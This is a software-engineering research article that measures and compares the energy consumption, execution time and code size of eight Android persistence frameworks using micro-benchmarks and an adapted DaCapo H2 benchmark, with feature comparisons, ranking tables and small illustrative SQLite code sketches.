Performance and programming effort trade-offs of android persistence frameworks Zheng Jason Song*, Jing Pu, Junjie Cheng, Eli Tilevich Software Innovations Lab, Virginia Tech, Blacksburg, VA 24061, United States A R T I C L E I N F O Article history: Received 30 August 2017 Revised 26 June 2018 Accepted 21 August 2018 Available online 23 August 2018 Keywords: Persistence framework Mobile application Performance Programming effort A B S T R A C T A fundamental building block of a mobile application is the ability to persist program data between different invocations. Referred to as persistence, this functionality is commonly implemented by means of persistence frameworks. Without a clear understanding of the energy consumption, execution time, and programming effort of popular Android persistence frameworks, mobile developers lack guidelines for selecting frameworks for their applications. To bridge this knowledge gap, we report on the results of a systematic study of the performance and programming effort trade-offs of eight Android persistence frameworks, and provide practical recommendations for mobile application developers. © 2018 Elsevier Inc. All rights reserved. 1. Introduction Any non-trivial application includes functionality that preserves and retrieves user data, both during the application session and across sessions; this functionality is commonly referred to as persistence. In persistent applications, relational or non-relational database engines preserve user data, which programmers operate on either by writing raw database operations or via data persistence frameworks. By providing abstractions on top of raw database operations, data persistence frameworks help streamline the development process.
As mobile devices continue to replace desktops as the primary computing platform, Android is poised to win the mobile platform contest, taking the 82.8% share of the mobile market in 2015 (Smartphone OS market share, 2015) with more than 1.6 million applications developed thus far (Statista, 2015). Energy efficiency remains one of the key considerations when developing mobile applications (Jha, 2011; Kwon and Tilevich, 2013a; Li et al., 2014), as the energy demands of applications continue to exceed the devices’ battery capacity. Consequently, in recent years researchers have focused their efforts on providing Android developers with insights that can be used to improve the energy efficiency of mobile applications. The research literature on the subject includes approaches ranging from general program analysis and modeling (Hao et al., 2013; Tiwari et al., 1996; Dong and Zhong, 2010; Chen et al., 2012) to application-level analysis (Sahin et al., 2012; Hindle, 2012; Kwon and Tilevich, 2013b; Pinto et al., 2014). Despite all the progress made in understanding the energy impact of programming patterns and constructs, a notable omission in the research literature on the topic is the energy consumption of persistence frameworks. Although an indispensable building block of mobile applications, these frameworks have never been systematically studied in this context; such a study can help programmers gain a comprehensive insight into the overall energy efficiency of modern mobile applications. Furthermore, to be able to make informed decisions when selecting a persistence framework for a mobile application, developers have to be mindful of the energy consumption, execution time, and programming effort trade-offs of major persistence frameworks. To that end, this paper reports on the results of a comprehensive study we have conducted to measure and analyze the energy consumption, execution time, and programming effort trade-offs of popular Android persistence frameworks.
For Android applications, persistence frameworks expose their APIs to the application developers as either object-relational mappings (ORM), object-oriented (OO) interfaces, or key-value interfaces, according to the underlying database engine. In this article, we consider the persistence libraries most widely used in Android applications (Mukherjee and Mondal, 2014). In particular, we study six widely used ORM persistence frameworks (ActiveAndroid by pardon, 0000; greenDAO, 0000; Ormlite, 0000; Sugar ORM, 0000; Sqlite database engine, 0000; DBFlow, 0000), one OO persistence framework (Realm database engine, 0000), and one key-value database operation framework (Paper, 0000) as our experimental targets. These frameworks operate on top of the popular SQLite, Realm, or NoSQL database engines. In our experiments, we apply these eight persistence frameworks to different benchmarks, and then compare and contrast the resulting energy consumption, execution time, and programming effort (measured as lines of programmer-written code). Our experiments include a set of micro-benchmarks designed to measure the performance of individual database operations as well as the well-known DaCapo H2 database benchmark (Blackburn et al., 2006). To better understand the noticeable performance and programming effort disparities between persistence frameworks, we also introduce a numerical model that juxtaposes the performance and programming effort of different persistence frameworks. By applying this model to the benchmarks, we generate several guidelines that can help developers choose the right persistence framework for a given application. In other words, one key contribution of our study is informing Android developers about how they can choose a persistence framework that achieves the desired energy/execution time/programming effort balance.
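The per-operation cost differences that such micro-benchmarks expose can be sketched outside Android entirely. The fragment below (in Python with the standard sqlite3 module, not any of the eight frameworks under study; the table and row counts are made up) times n inserts committed one at a time versus wrapped in a single transaction, which is the distinction that the frameworks' batch APIs build on:

```python
import sqlite3
import time

def bench_inserts(n, batched):
    """Time n row inserts: one commit per row vs. a single transaction."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE person (id INTEGER PRIMARY KEY, name TEXT)")
    rows = [(i, f"user{i}") for i in range(n)]

    start = time.perf_counter()
    if batched:
        # One transaction for all rows, as a framework's batch API would do.
        with con:
            con.executemany("INSERT INTO person VALUES (?, ?)", rows)
    else:
        # Commit after every row, mimicking naive per-operation usage.
        for row in rows:
            con.execute("INSERT INTO person VALUES (?, ?)", row)
            con.commit()
    elapsed = time.perf_counter() - start
    con.close()
    return elapsed

per_row = bench_inserts(2000, batched=False)
batch = bench_inserts(2000, batched=True)
print(f"per-row: {per_row:.4f}s  batched: {batch:.4f}s")
```

On a real device, commits to on-disk SQLite (with fsync costs) make the gap between the two modes far larger than this in-memory sketch suggests, which is why the volume of persisted data and the number of transactions both appear as factors in the experiments.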
Depending on the amount of persistence functionality in an application, the choice of a persistence framework may dramatically impact the levels of energy consumption, execution time, and programming effort. By precisely measuring and thoroughly analyzing these characteristics of alternative Android persistence frameworks, this study aims at gaining a deeper understanding of the persistence’s impact on the mobile software development ecosystem. The specific questions we want to answer are: **RQ1.** How do popular Android persistence frameworks differ in terms of their respective features and capabilities? **RQ2.** What is the relationship between the persistence framework’s features and capabilities and the resulting execution time, energy efficiency, and programming effort? **RQ3.** How do the characteristics of an application’s database functionality affect the performance of persistence frameworks? **RQ4.** Which metrics should be measured to meaningfully assess the appropriateness of a persistence framework for a given mobile application scenario? To answer RQ1, we analyze the documentation and implementation of the persistence frameworks under study to compare and contrast their features and capabilities. To answer RQ2 and RQ3, we measure each of the energy, execution time, and programming effort metrics separately, compute their correlations, as well as analyze and interpret the results. To answer RQ4, we introduce a numerical model, apply it to the benchmarks used for the measurements, and generate several recommendation guidelines. Based on our experimental results, the main contributions of this article are as follows: 1. To the best of our knowledge, this is the first study that empirically evaluates the energy, execution time, and programming effort trade-offs of popular Android persistence frameworks. 2.
Our experiments consider multifaceted combinations of factors which may impact the energy consumption and execution time of persistence functionality in real-world applications, which include persistence operations involved, the volume of persisted data, and the number of transactions. 3. Based on our experimental results, we offer a series of guidelines for Android mobile developers to select the most appropriate persistence framework for their mobile applications. For example, ActiveAndroid or OrmLite fit well for applications processing relatively large data volumes in a read-write fashion. These guidelines can also help the framework developers to optimize their products for the mobile market. 4. We introduce a numerical model that can be applied to evaluate the fitness of a persistence framework for a given application scenario. Our model considers programming effort in addition to execution time and energy efficiency to provide insights relevant to software developers. The rest of this paper is organized as follows. Section 2 summarizes the related prior work. Section 3 provides the background information for this research. Section 4 describes the design of our experimental study. Section 5 presents the study results and interprets our findings. Section 6 presents our numerical model and offers practical guidelines for Android developers. Section 7 discusses the threats to internal and external validity of our experimental results. Section 8 concludes this article. This work extends our previous study of Android persistence frameworks, published in IEEE MASCOTS 2016 (Jing et al., 2016). This article is a revised and extended version of that paper. 
In particular, we describe the additional research we conducted, which now includes: (1) a comprehensive analysis of the studied frameworks’ features, (2) the measurements and analysis for two additional persistence frameworks, (3) a study of the relationship between database operations, execution time, and energy consumption, based on our measurements, and (4) a novel empirical model for selecting frameworks for a given set of development requirements. ### 2. Related work This section discusses some prior approaches that have focused on understanding the execution time, energy efficiency, and programming effort factors as well as their interaction in mobile computing. Multiple prior studies have focused on understanding the energy consumption of different mobile apps and system calls, including approaches ranging from system level modeling of general systems (Tiwari et al., 1996) and mobile systems (Dong and Zhong, 2010), to application level analysis (Banerjee et al., 2014) and optimization (Kwon and Tilevich, 2013b). For example, Chowdhury et al. study the energy consumed by logging in Android apps (Chowdhury et al., 2017), as well as the energy consumed by HTTP/2 in mobile apps (Chowdhury et al., 2016). Liu et al. (2016) study the energy consumed by wake locks in popular Android apps. Many of these works make use of the Green Miner testbed (Hindle et al., 2014) to accurately measure the amount of consumed energy. As an alternative, the Monsoon power monitor (0000) is also used to measure the energy consumed by various Android APIs (Li et al., 2014; Linares-Vásquez et al., 2014). In our work, we have decided to use the Monsoon power meter, due to the tool’s ease of deployment and operation. Many studies also focus on the impact of software engineering practices on energy consumption. For example, Sahin et al. (2012) study the relationship between design patterns and software energy consumption. Hindle et al.
(2014) provide a methodology for measuring the impact of software changes on energy consumption. Hasan et al. (2016) provide a detailed profile of the energy consumed by common operations performed on the Java List, Map, and Set data structures to guide programmers in selecting the correct library classes for different application scenarios. Pinto et al. (2014) study how programmers treat the issue of energy consumption throughout the software engineering process. The knowledge inferred from the aforementioned studies of energy consumption can be applied to optimize the energy usage of mobile apps, either by guiding the developer (Cohen et al., 2012; Pathak et al., 2012) or via automated optimization (Li et al., 2016). As discovered in Manotas et al. (2016), mobile app developers tend to be better tuned to the issues of energy consumption than developers in other domains, with a large portion of interviewed developers taking the issue of reducing energy consumption into account during the development process. Local databases are widely used for persisting data in Android apps (Lyu et al., 2017), and the corresponding database operation APIs are known to be “energy-greedy” (Linares-Vásquez et al., 2014). Several persistence frameworks have been developed with the goal of alleviating the burden of writing SQL queries by hand. However, how these frameworks affect the energy consumption of Android apps has not yet been studied systematically. To bridge this knowledge gap, in this work, we study not only the performance of such frameworks, but also the programming effort they require, with the resulting knowledge base providing practical guidelines for mobile app developers, who need to decide which persistence framework should be used in a given application scenario. 3. Background To set the context for our work, this section describes the persistence functionality, as it is commonly implemented by means of database engines and persistence frameworks.
The designers of the Android platform have recognized the importance of persistence by including the SQLite database module with the standard Android image as early as release 1.5. Ever since, this module has been used widely in Android applications. According to our analysis of the most popular 550 applications hosted on Google Play (25 most popular apps for each category, and 22 categories in all), over 400 of them (73%) involve interactions with the SQLite module. The ORM (object-relational mapping) frameworks have been introduced and refined to facilitate the creation of database-oriented applications (Xia et al., 2009; Cvetković and Janković, 2010). The prior studies of the ORM frameworks have focused mainly on their execution efficiency and energy efficiency. Meanwhile, Vetro et al. (2013) show how various software development factors (e.g., design patterns, software architecture, information hiding, implementation of persistence layers, code obfuscation, refactoring, and data structure usage) can significantly influence the performance of a software system. In this article, we compare the performance of different persistence frameworks in a mobile execution environment with the goal of understanding the results from the perspective of mobile app developers. Android persistence frameworks A persistence framework serves as a middleware layer that bridges the application logic with the database engine’s operations. The database engine maintains a schema in memory or on disk, and the framework provides a programming interface for the application to interact with the database engine. As SQLite (the native database of Android) is a relational database engine, most Android persistence frameworks developed for SQLite are ORM frameworks.
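The mediation that such a middleware layer performs can be reduced to a toy example. The sketch below (plain Python and the built-in sqlite3 module; the Note entity and NoteDao class are invented for illustration, not taken from any framework under study) shows the two directions of the mapping: entity objects are flattened into rows on writes, and rows are rebuilt into entities on reads:

```python
import sqlite3
from dataclasses import dataclass

@dataclass
class Note:
    """Entity class: one instance corresponds to one table row."""
    id: int
    text: str

class NoteDao:
    """Minimal mapping layer: hides SQL behind entity-based calls."""

    def __init__(self, con):
        self.con = con
        con.execute(
            "CREATE TABLE IF NOT EXISTS note (id INTEGER PRIMARY KEY, text TEXT)"
        )

    def insert(self, note):
        # Object -> row: the direction the application developer never sees.
        self.con.execute("INSERT INTO note VALUES (?, ?)", (note.id, note.text))

    def find(self, note_id):
        # Row -> object: query results come back as entities, not tuples.
        row = self.con.execute(
            "SELECT id, text FROM note WHERE id = ?", (note_id,)
        ).fetchone()
        return Note(*row) if row else None

con = sqlite3.connect(":memory:")
dao = NoteDao(con)
dao.insert(Note(1, "buy milk"))
print(dao.find(1))
```

A real ORM additionally generates the schema from the entity class, tracks relationships, and caches instances; this sketch only illustrates the impedance-mismatch translation that the following paragraphs discuss.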
One major function of such object-relational mapping (ORM) and object-oriented frameworks is to solve the object-relational impedance mismatch (Subramanian et al., 1999) between the object-oriented programming model and the relational database operation model. We evaluate 8 frameworks: Android SQLite, ActiveAndroid, greenDAO, OrmLite, Sugar ORM, DBFlow, Java Realm, and Paper, backed by the SQLite, Realm, and NoSQL database engines, which are customized for mobile devices with limited resources, including battery power, memory, and processor.

#### Persistence framework feature comparison

Persistence frameworks differ in a variety of ways, including database engines, programming support (e.g., object and schema auto-generation), programming abstractions (e.g., data access object (DAO) support, relationships, raw query interfaces, batch operations, complex updates, and aggregation operations), relational feature support (e.g., key/index structure, SQL join operations, etc.), and execution modes (e.g., transactions and caching). We focus on these features, as they may impact energy consumption, execution time, and programming effort. Table 1 summarizes the similarities and differences of the persistence frameworks used in our study.

1. **Database engine** Six of the studied persistence frameworks use SQLite (Newman, 2004), an ACID (Atomic, Consistent, Isolated, and Durable) and SQL standard-compliant relational database engine. The Java Realm framework uses Realm (Realm database engine, 0000), an object-oriented database engine whose design goal is to provide functionality equivalent to relational engines. Paper uses NoSQL (0000), a non-relational, schema-free, key-value data store. Since we mainly compare relational database features here, Paper, backed by a non-relational engine, lacks many of these features.

2.
**Object code generation** Some frameworks feature code generators, which relieve the developer from having to write by hand the classes that represent the relational schema in place.

3. **Schema generation** At the initialization stage, persistence frameworks employ different strategies to generate the database schema. Android SQLite requires raw SQL statements to create database tables, while OrmLite provides a special API call. greenDAO generates a special DAO class that includes the schema. The remaining frameworks (excluding Paper) automatically extract the table schema from the programmer-defined entity classes.

4. **Data access method** DAO (Data Access Object) is a well-known abstraction strategy for database access that provides a unified object-oriented, entity-based persistence operation set (insert, update, delete, query, etc.). greenDAO, Sugar ORM, and OrmLite provide the DAO layer, while Android SQLite adopts a relational rather than DAO database manipulation interface. ActiveAndroid, DBFlow, and Java Realm provide a hybrid strategy—both DAO and SQL builder APIs.

5. **Relationship support** The three relationships between entities are one-to-one, one-to-many, and many-to-many. greenDAO and Java Realm support all three relationships. ActiveAndroid lacks support for many-to-many, while Sugar ORM and DBFlow only support one-to-many. Android SQLite and OrmLite lack support for relationships, requiring the programmer to write explicit SQL join operations.

6. **Raw query interface support** Raw queries use native SQL statements, thus deviating from pure object-orientation to execute complex database operations on multiple tables, nested queries, and aggregation functions. Android SQLite, greenDAO, OrmLite, and DBFlow all provide this functionality.

7. **Batch operations** Batch operations commit several same-type database changes at once, thus improving performance. greenDAO, OrmLite, Sugar ORM, and DBFlow provide batch mechanisms for insert, update, and delete.
Java Realm provides batch inserts only, and the remaining two frameworks lack this functionality.

8. **Complex update support** Typically there are two kinds of database update operations: updating columns to given values, or updating columns based on arithmetic expressions. Android SQLite and ActiveAndroid can only use the raw SQL manipulation interface to support expression updates. greenDAO, Sugar ORM, Java Realm, and DBFlow support complex updates via entity field modification. OrmLite is the only framework that provides both the value update and expression update abstractions.

9. **Aggregation support** Aggregating data in a relational database enables statistical analysis over a set of records. Different frameworks selectively implement aggregation functionality. Android SQLite, OrmLite, and DBFlow support all of the aggregation functions via a raw SQL interface. Java Realm and Sugar ORM provide an aggregation subset in the entity layer. ActiveAndroid and greenDAO support only the COUNT aggregation.

10. **Key/index structure** A key/index structure identifies individual records, indicates table correlations, and increases the execution speed. Android SQLite and DBFlow fully support the database constraints—single or multiple primary keys (PK), index, and foreign key (FK). ActiveAndroid supports integer single PK, unique, index, and FK. greenDAO supports integer single PK, unique, and index. OrmLite supports single PK, index, and FK. Sugar ORM supports integer single PK and unique. Java Realm supports string or integer single PK, and index.

11. **SQL JOIN support** The SQL JOIN clause combines data from two or more relational tables. Android SQLite and DBFlow only support raw JOIN SQL. ActiveAndroid incorporates JOIN in its object query interface. The DAOs of greenDAO and OrmLite provide the JOIN operation. Sugar ORM and Java Realm lack this support.

12. **Transaction support** Transactions perform a sequence of operations as a single logical execution unit.
All the studied frameworks, with the exception of greenDAO, Sugar ORM, and Paper, provide full transactional support.

13. **Cache support** OrmLite, ActiveAndroid, greenDAO, DBFlow, and Paper support caching. They provide this advanced feature to maintain persisted entities in memory to speed up future accesses, at the cost of extra processing required to initialize the cache pool.

### 4. Experiment design

In this section, we explain the main decisions we have made to design our experiments. In particular, we discuss the benchmarks, the measurement variables, and the experimental parameters.

#### 4.1. Benchmark selection

DaCapo H2 (Blackburn et al., 2006) is a well-known Java database benchmark that interacts with the H2 Database Engine via JDBC. This benchmark manipulates a considerable volume of data to emulate bank transactions. The benchmark includes (1) a complex schema and non-trivial functionality, obtained from a real-world production environment. The database structure is complex (12 tables, with 120 table columns and 11 relationships between tables), while the database operations simulate the running of heavy-workload database-oriented applications; (2) complex database operations that require batching, aggregations, and transactions. Since DaCapo relies heavily on relational data structures and operations, we replace H2 with the SQLite and Realm database engines to adapt this benchmark for Android. In other words, we evaluate the performance of all persistence frameworks under the DaCapo benchmark except for Paper, which is backed by a non-relational database engine. However, the DaCapo benchmark alone cannot evaluate the performance of persistence frameworks under low data volumes and simple schemas. To establish a baseline for our evaluation, we thus designed a set of micro benchmarks, referred to as the Android ORM Benchmark, which features a simple database schema with few data records.
Specifically, this benchmark's database structure includes 2 tables comprising 11 table columns, and a varying small number of data records. In addition, this micro-benchmark comprises the fundamental database operation invocations "create table", "insert", "delete", "select", and "update". As the database operations in many mobile applications tend to be rather simple, the micro-benchmark's results present valuable insights for application developers. Note that database operations differ from database operation invocations. The invocations refer to calling the interfaces provided by the persistence framework (e.g., "insert", "select", "update", and "delete"). However, each invocation can result in multiple database operations (e.g., `android...SQLiteDatabase.executeInsert()`).

#### 4.2. Test suite implementation

Our experimental setup comprises a mobile app that uses the selected benchmarked frameworks to execute both DaCapo and the Android ORM Benchmark. Through this app, experimenters can select benchmarks, parameterize the operation and data volume, as well as select ORM frameworks. The implementation of the test suite was carried out by two graduate students, each of whom has more than three years of experience in developing commercial database-driven projects. As stated above, the DaCapo database benchmark is designed for relational databases, so it would be non-trivial to reimplement it using Paper, which is based on a non-relational database engine (NoSQL). Therefore, the DaCapo benchmark is only applied to seven persistence frameworks, while the Android ORM Benchmark is applied to all eight persistence frameworks. For each benchmark, the transaction logic (e.g., creating bank accounts for DaCapo) is implemented using the various ORM frameworks, following the design guidelines of these frameworks. For example, greenDAO, Sugar ORM, and OrmLite provide object-oriented data access methods, so their benchmarks' data operations are implemented by using DAOs.
On the contrary, Android SQLite adopts a relational rather than DAO database manipulation interface, so its benchmark's data operations are implemented by using SQL builders. ActiveAndroid, DBFlow, and Java Realm provide a hybrid strategy—both DAO and SQL builder APIs. For these frameworks, if the benchmark's operation is impossible or non-trivial to express using DAO, the SQL builder API is used instead.

#### 4.3. Parameters and variables

Next, we explain the variables used to evaluate the execution time, energy consumption, and programming effort of the studied persistence frameworks. We also describe how these variables are obtained.

- **Overall execution time** The overall execution time is the time elapsed from the point when a database transaction is triggered to the point when it completes.

- **Read/write database operation number** We focus on comparing the Read/Write numbers only for SQLite-based frameworks (ActiveAndroid, greenDAO, OrmLite, Sugar ORM, and DBFlow), as such frameworks use the SQLite operation interfaces provided by the Android framework to operate on the SQLite database. The write operations include executing SQL statements that "insert", "delete", and "update", while the read operations include only "select". When performing the same combination of transactions, the differences in Read/Write numbers reflect how the different persistence frameworks interpret database operation invocations. The read/write ratio can also impact the energy consumption. The operation numbers are obtained by hooking into the SQLite operation interfaces provided by the Android System Library. For those interfaces provided for a certain type of database operation, we mark them as "Read" or "Write"; for those interfaces provided for general SQL execution, we search for certain keywords (e.g., insert, update, select, and delete) in the SQL strings, and mark them as "Read" or "Write" accordingly.
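The keyword-based marking of general SQL strings can be sketched as follows. This is a hedged Python illustration: the study's actual hooks live inside the Android System Library, and the exact matching rules are not specified in the text, so the leading-keyword heuristic below is our own simplifying assumption.

```python
READ_KEYWORDS = {"select"}
WRITE_KEYWORDS = {"insert", "update", "delete"}

def classify_sql(sql: str) -> str:
    """Mark a raw SQL string as a Read or Write database operation
    by inspecting its leading keyword (a simplifying assumption)."""
    head = sql.lstrip().split(None, 1)[0].lower()
    if head in READ_KEYWORDS:
        return "Read"
    if head in WRITE_KEYWORDS:
        return "Write"
    return "Other"  # e.g., CREATE TABLE, PRAGMA, BEGIN/COMMIT

print(classify_sql("SELECT address FROM alias"))       # Read
print(classify_sql("  UPDATE account SET balance=0"))  # Write
```

Statements that are neither reads nor writes (schema creation, transaction control) fall into a third bucket and are excluded from the Read/Write counts.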
- **Energy consumption** The energy consumption can be calculated from the real-time current of the Android device's battery. We use the Monsoon power monitor (0000) to monitor the current and voltage of the device's battery, as shown in Fig. 1. As the output voltage of a smartphone's battery remains stable, only the current and time are required to calculate the energy consumed. Eq. (1) is used to calculate the overall energy consumption, where I is the average current (mA) and t is the time window (ms), yielding E in micro-ampere-hours. The micro-ampere-hour is a unit of electric charge, commonly used to measure the capacity of electric batteries.

\[ E = \frac{I \times t}{3600} \]  (1)

The equation shows that the energy consumption is proportional to the execution time, as well as to the current required by the device's hardware (e.g., CPU, memory, network, and hard disk). For the persistence frameworks, the differences in energy consumption reflect not only the execution time differences, but also the different CPU workload and hard disk R/W operations required to process database operations.

- **Uncommented lines of code (ULOC)** ULOC reflects the required effort, defined as the amount of code a programmer has to write to use a persistence framework. For its simplicity, ULOC was used to express programming effort in earlier studies (e.g., Lavazza et al., 2016). As all the test suites are implemented only in Java and SQL, the ULOC metric is reflective of the relative programming effort incurred by using a framework.

Next, we introduce the input parameters for the different benchmarks. For the DaCapo benchmark, we want to explore the performance boundary of different persistence frameworks under a heavy workload. Therefore, we scale the total number of transactions up to large values, and record the overall time taken and energy consumed. For the micro benchmark, we study the "initialize", "insert", "select", "update", and "delete" invocations in turn.
We change the number of transactions for the last four invocations, so for the "select", "update", and "delete" invocations, the amount of data records also changes. Therefore, the input parameters for the micro benchmark are a pair: [NUMBER OF TRANSACTIONS, AMOUNT OF DATA RECORDS].

#### 4.4. Experimental hardware and tools

To measure the energy consumed by a device, its battery must be removed to connect to the power meter's hardware. Unfortunately, a common trend in the design of Android smartphones makes removable batteries a rare exception. The most recent device available for our experiments is an LG LS740 smartphone, with 1GB of RAM, 8GB of ROM, and a 1.2GHz quad-core Qualcomm Snapdragon 400 processor (Singh and Jain, 2014), running the Android 4.4.2 KitKat operating system. Although the device was released in 2014 and runs at a lower CPU frequency than the devices in common use today, the Android hardware design, at least with respect to the performance parameters measured, has not experienced a major transformation, thus not compromising the relevance of our findings. We execute all experiments as the only load on the device's OS. To minimize the interference from other major sources of energy consumption, we set the screen brightness to the minimal level and turn off the WiFi/GPS/Data modules. As the CPU frequency takes time to normalize once the device exits sleep mode, we run each benchmark 5 times within the same environment, with the first two runs warming up the system until the background energy consumption rate stabilizes. The reported data is calculated as the average of the last 3 runs, with the differences among the three runs of the same benchmark being no larger than 5%.

1 All the code used in our experiments can be downloaded from [https://github.com/AmberPoo/PEPBench](https://github.com/AmberPoo/PEPBench).
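The energy computation of Eq. (1) and the run-averaging protocol above can be sketched in Python. The sample values below are hypothetical, not measurements from the study; note that 1 mA·ms equals 1 µA·s, so dividing by 3600 s/hour yields micro-ampere-hours.

```python
def energy_uAh(samples):
    """Integrate (current_mA, window_ms) samples into micro-ampere-hours,
    following E = (I * t) / 3600 with I in mA and t in ms."""
    return sum(i_ma * t_ms for i_ma, t_ms in samples) / 3600.0

def average_stable_runs(run_values, warmup=2, max_spread=0.05):
    """Discard the warm-up runs, verify the remaining runs agree
    within 5%, and return their average (the reported data point)."""
    kept = run_values[warmup:]
    spread = (max(kept) - min(kept)) / min(kept)
    assert spread <= max_spread, f"runs differ by {spread:.1%}; re-measure"
    return sum(kept) / len(kept)

# 100 mA sustained for a total of 3.6 s corresponds to 100 uAh.
print(energy_uAh([(100.0, 1200.0), (100.0, 2400.0)]))            # 100.0
# Five runs: the first two warm-up values are dropped, the rest averaged.
print(average_stable_runs([130.0, 112.0, 100.0, 101.0, 102.0]))  # 101.0
```

The 5% spread check guards against background activity (CPU frequency scaling, system services) contaminating a run.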
To understand the Dalvik VM method invocations, we use Traceview, an Android profiler that makes it possible to explore the impact of programming abstractions on the overall performance. Unfortunately, only the Android ORM benchmark is suitable for this exploration, due to the Traceview scalability limitations.

### 5. Study results

In this section, we report and analyze our experimental results.

#### 5.1. Experiments with the Android ORM benchmark

In this group of experiments, we use the micro benchmark to study how the type of operation (insert, update, select, and delete) and variations in the number of transactions impact energy consumption and execution time for the different frameworks. The experimental results for each type of persistence operation are presented in Figs. 2 and 3. The first row of Fig. 2(a) and (b) shows the energy consumption and execution time of the "insert" database invocation, and Fig. 2(c) shows those of the "update", "select", and "delete" database invocations, respectively. Fig. 3(a)–(d) show the database read and write operations of these four invocations, respectively. The results show that the persistence frameworks differ in terms of their respective energy consumption, execution time, read, and write measurements. Next, we compare the results by operation:

**Insert** We observe that DBFlow takes the longest time to perform the insert operation, while ActiveAndroid takes the second longest, with the remaining frameworks showing comparable performance levels. DBFlow performs the highest number of database operations, a measurement that explains its long execution time. Differently from the other frameworks, DBFlow requires that a database read operation be performed before a database write operation, to ensure that the record to insert has not already been inserted into the database. Besides, the runtime trace reveals that interactions with the cache triggered by inserts in ActiveAndroid are expensive, costing 62% of the overall execution time.
By contrast, greenDAO exhibits the shortest execution time, due to its simple but efficient batch insert encapsulation, as shown in Table 1.

**Update** We observe that the cost of the Java Realm update is several orders of magnitude larger than that of the other frameworks, especially as the number of transactions grows. Several reasons can explain the high performance costs of the update operation in Java Realm. As one can see in Table 1, Java Realm lacks support for batch updates. Besides, the update procedure invokes the underlying library method, TableView.size(), which operates on a memory-hosted list of entities and costs more than 98% of the overall execution time. The execution time of Sugar ORM is also high, due to it having the highest number of read and write operations. Sugar ORM needs to search for the target object before updating it. This search procedure is designed as the recursive SugarRecord.find() method, which costs 96% of the overall execution time.

**Select and delete** For the select and delete operations, we observe that Sugar ORM (1) exhibits the worst performance in terms of execution time and energy consumption; and (2) performs the highest number of database operations, as it executes an extra query for each atomic operation. The inefficiency of the select and delete operations in Sugar ORM stems from the presence of these extra underlying operations. However, as discussed above, the bulk of the execution time is spent in the recursive find method. OrmLite, greenDAO, DBFlow, Paper, and Android SQLite show comparable performance levels when executing these two operations.

Table 2 sums up the rankings of each persistence framework w.r.t. the different database operation invocations. We also measure the Uncommented Lines of Code (ULOC) for implementing all the basic database operation invocations for each persistence framework and include this metric in the table. From Table 2 and our analysis above, we can draw the following conclusions: 1.
By adding up the rankings of the different operations, we can rank these frameworks in terms of their overall performance: Android SQLite > greenDAO = DBFlow > OrmLite > Java Realm > Paper > Sugar ORM > ActiveAndroid, where ">" means "having better performance than", and "=" means "having similar performance to". 2. Considering the programming effort of implementing all database operations using the different frameworks, DBFlow and Paper require less programming effort than the other frameworks. 3. When considering the balance of programming effort and performance, DBFlow can be generally recommended for developing database-oriented mobile applications with a standard database operation/schema complexity. 4. Sugar ORM would not be an optimal choice when the dominating operations in a mobile app are select or delete, DBFlow would not be optimal when the dominating operation is insert, while Java Realm would not be optimal when the dominating operation is update.

#### 5.2. Experiments with the DaCapo benchmark

In this group of experiments, we use the DaCapo benchmark to study how the energy consumption and execution time of each framework change in relation to the number of executed bank transactions. The benchmark comes with a total of 41,971 records. In our measurements, we vary the number of bank transactions over the following values: 40, 120, 200, 280, 360, 440, 520, 600, 800, 1000, 1500. The total number of transactions is the sum of the basic bank transactions, as listed in Table 3. Each transaction comprises a complex set of database operations. The key transactions in each run are "New Order", "Payment by Name", and "Payment by ID", which mainly execute the "query" and "update" operations. In our experiments, "New Order" itself accounts for 42.5% of the entire number of transactions.

Fig. 2. Energy/execution time for the Android ORM benchmark with alternative persistence frameworks.
Table 2
Comparison of persistence frameworks in the Android ORM experiment.

<table>
<thead>
<tr> <th>Compared item</th> <th>SQLite</th> <th>DBFlow</th> <th>greenDAO</th> <th>ORMLite</th> <th>Realm</th> <th>Paper</th> <th>Sugar</th> <th>ActiveAndroid</th> </tr>
</thead>
<tbody>
<tr> <td>ULOC</td> <td>306</td> <td>181</td> <td>241</td> <td>326</td> <td>313</td> <td>190</td> <td>226</td> <td>253</td> </tr>
<tr> <td>Initialization ranking</td> <td>6</td> <td>1</td> <td>5</td> <td>7</td> <td>3</td> <td>4</td> <td>2</td> <td>8</td> </tr>
<tr> <td>Insert ranking</td> <td>2</td> <td>8</td> <td>1</td> <td>4</td> <td>3</td> <td>5</td> <td>6</td> <td>7</td> </tr>
<tr> <td>Update ranking</td> <td>1</td> <td>2</td> <td>3</td> <td>4</td> <td>5</td> <td>6</td> <td>8</td> <td>7</td> </tr>
<tr> <td>Select ranking</td> <td>4</td> <td>2</td> <td>1</td> <td>3</td> <td>7</td> <td>6</td> <td>8</td> <td>5</td> </tr>
<tr> <td>Delete ranking</td> <td>1</td> <td>2</td> <td>5</td> <td>3</td> <td>8</td> <td>7</td> <td>6</td> <td>4</td> </tr>
<tr> <td>Summed up ranking</td> <td>14</td> <td>15</td> <td>15</td> <td>21</td> <td>26</td> <td>28</td> <td>30</td> <td>31</td> </tr>
</tbody>
</table>

Table 3
Number of operations for each transaction type with 1500 overall transactions.

<table>
<thead>
<tr> <th>Transaction type</th> <th>Operation amount</th> </tr>
</thead>
<tbody>
<tr> <td>New order rollback</td> <td>8</td> </tr>
<tr> <td>Order status by ID</td> <td>26</td> </tr>
<tr> <td>Order status by name</td> <td>42</td> </tr>
<tr> <td>Stock level</td> <td>59</td> </tr>
<tr> <td>Delivery schedule</td> <td>62</td> </tr>
<tr> <td>Payment by ID</td> <td>245</td> </tr>
<tr> <td>Payment by name</td> <td>391</td> </tr>
<tr> <td>New order</td> <td>667</td> </tr>
</tbody>
</table>

In Fig. 4, (a) and (b) show the energy/execution time and read/write operations of the DaCapo initialization, respectively. Fig. 4(c) shows the energy consumption for each transaction number, and Fig.
4(d) shows the execution time for each transaction number. Fig. 4(e) and (f) show the read and write operation numbers, respectively. As the write operation numbers of ActiveAndroid, greenDAO, OrmLite, Sugar ORM, and SQLite are very close (e.g., when the transaction amount is 1500, the numbers of write operations are 18,209, 18,200, 18,205, 18,211, and 18,212, respectively), we only present the average operation number of these five frameworks in Fig. 4(e). Similarly, we use the line in pink to present Sugar ORM/greenDAO, and the line in green for SQLite/ActiveAndroid in Fig. 4(f). Table 3 shows the number of operations performed by each transaction. The dominant database operation in the initialization phase is insert, and Fig. 4(a) shows performance levels consistent with those seen in the Android ORM benchmark for the same operation.

Fig. 4. Energy/execution time/read and write for DaCapo benchmark with alternative persistence frameworks. (For interpretation of the references to color in this figure, the reader is referred to the web version of this article.)

